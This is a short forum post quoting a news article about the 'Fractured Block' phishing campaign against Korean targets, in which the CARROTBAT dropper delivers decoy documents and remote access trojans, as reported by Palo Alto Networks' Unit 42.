30 November 18, 18:11
Quote:A phishing campaign targeting the Korean peninsula is using a malicious dropper called CARROTBAT to deliver decoy documents and secondary payloads such as remote access trojans to its victims.
Dubbed Fractured Block, the campaign began last March, but has noticeably picked up steam in the last three months, according to a blog post by Josh Grunzweig and Kyle Wilhoit, researchers at Palo Alto Networks’ Unit 42 division.
Unit 42 has so far identified 29 unique CARROTBAT samples, noting that their final payloads have varied between the FTP-based RAT SYSCON and the recently discovered Oceansalt malware implant that uses code associated with APT1 (aka Comment Crew), a reputed Chinese APT actor.
Unit 42 describes CARROTBAT as “a dropper that allows an attacker to drop and open an embedded decoy file” saved as one of 11 different formats, “followed by the execution of a command that will download and run a payload on the targeted machine. This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility.”
Source: https://www.scmagazine.com/home/security...interests/
![[-]](https://www.geeks.fyi/images/collapse.png)
